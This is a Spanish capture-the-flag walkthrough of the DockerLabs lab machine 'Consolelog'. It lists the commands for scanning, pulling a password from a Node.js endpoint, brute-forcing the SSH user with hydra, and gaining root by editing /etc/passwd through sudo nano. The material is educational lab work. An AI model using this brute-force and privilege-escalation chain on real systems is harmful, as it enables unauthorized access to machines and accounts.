Máquina: Consolelog
SO: Linux
Nivel: Facil
DockerLabs


1. Escaneando los puertos y servicios abiertos de la maquina, tenemos 3 servicios disponibles.

sudo nmap -p- -T5 --min-rate=5000 --open -sCV -n -Pn 172.17.0.2

img

2. En el servicio apache por la web tenemos un boton que si pulsamos y vemos por la consola nos muestra un mensaje.

http://172.17.0.2

img

3. Hacemos la peticion enviando nuestro token al servidor nodejs, nos devuelve una contraseña, o tambien lo podemos encontrar mediante fuzzing en el fichero server.js.

curl -s -X POST http://172.17.0.2:3000/recurso/ -H "Content-Type: application/json" -d '{"token":"tokentraviesito"}' ;echo

http://172.17.0.2/backend/server.js

img

4. Intentamos la fuerza bruta por ssh con esta contraseña, dimos con el usuario para conectarnos por ssh.

hydra -L /usr/share/wordlists/rockyou.txt -p lapassworddebackupmaschingonadetodas ssh://172.17.0.2:5000

img

5. Procedemos a conectarnos como usuario lovely por el ssh.

ssh lovely@172.17.0.2 -p 5000

img

6. Revisamos los privilegios sudo del usuario, tenemos un binario con todos los permisos.

sudo -l

img

7. Ya que podemos ejecutar el binario nano como root, podemos editar el passwd, le quitamos la x de root que representa su contraseña activa.

sudo /usr/bin/nano /etc/passwd

img img

8. Una vez realizado los cambios solo nos queda migrar a root sin proporcinar contraseña alguna.

su root

img


Finalizado.